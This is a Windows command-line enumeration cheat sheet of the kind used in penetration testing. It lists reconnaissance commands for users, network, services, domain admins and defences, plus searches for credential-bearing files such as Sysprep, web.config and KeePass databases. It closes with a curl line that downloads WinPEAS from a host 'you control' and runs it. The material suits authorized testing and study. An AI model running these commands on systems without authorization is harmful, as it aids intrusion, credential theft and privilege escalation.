Windows basic enumeration (cmd) cheatsheet:
System information:
hostname # Show the hostname of the machine
whoami # Show the current user
whoami /priv # List the current user's privileges
whoami /groups # List the current user's group memberships
systeminfo # Display OS version, build, installed hotfixes, hostname, domain, etc.
ver # Show the Windows version
echo %PROCESSOR_ARCHITECTURE% # Show system architecture
set # Display environment variables
Users and groups:
net user # List local user accounts
net user <username> # Show details for a specific local user
net localgroup # List local groups
net localgroup Administrators # Show members of the local Admin group
qwinsta # Display information about sessions (console and RDP) on the host
Networking:
ipconfig /all # Show network interfaces, IP, DNS, gateways
route print # Display the routing table
arp -a # Show ARP cache entries
netstat -ano # List active connections/ports with PIDs
nslookup localhost # Verify DNS resolution works
type C:\Windows\System32\drivers\etc\hosts # View local hostname mappings
Processes and services:
tasklist # List running processes
tasklist /svc # Show processes and associated services
sc query # List services
sc qc <service> # Show service configuration details
wmic service get name,displayname,pathname,startmode # List services with executable paths (WMIC is deprecated on recent Windows versions)
Scheduled tasks:
schtasks /query /fo LIST /v # List scheduled tasks with verbose details
Files and directories:
dir C:\ /a # List files, including hidden ones, in C:\
dir /s /b *.txt # Search for text files recursively
dir /s /b *.config # Search for config files recursively
dir /s /b *.ini # Search for INI files recursively
tree C:\Users /f # Show directory tree under Users
Interesting files:
dir /s /b unattended.xml # Search for unattended installation files
dir /s /b sysprep.inf # Search for Sysprep files
dir /s /b sysprep.xml # Search for Sysprep XML files
dir /s /b web.config # Search for IIS and application config files
dir /s /b *.kdbx # Search for KeePass databases
Permissions and privileges:
icacls C:\Users # View permissions on the Users directory
accesschk.exe -uwcqv "Authenticated Users" * # Check which services Authenticated Users can write to (Sysinternals AccessChk; not built in, must be present on the host)
Shares:
net share # List local shared folders
net use # Show mapped network drives
net session # List active SMB sessions
Firewalls and antivirus:
netsh advfirewall show allprofiles # Show firewall status for all profiles
sc query windefend # Check Windows Defender service status
Domain information:
set l # Show environment variables starting with "l", e.g. LOGONSERVER
nltest /dsgetdc:<domain> # Find a domain controller
net user /domain # List domain users
net group /domain # List domain groups
net group "Domain Admins" /domain # Show members of Domain Admins
Logs:
wevtutil qe System /c:20 /f:text # Show the last 20 System event log entries
wevtutil qe Security /c:20 /f:text # Show the last 20 Security event log entries
WinPEAS:
curl http://<IP>/winPEASx64.exe --output winPEASx64.exe # Download WinPEAS from a host you control
winPEASx64.exe # Run WinPEAS for automated enumeration
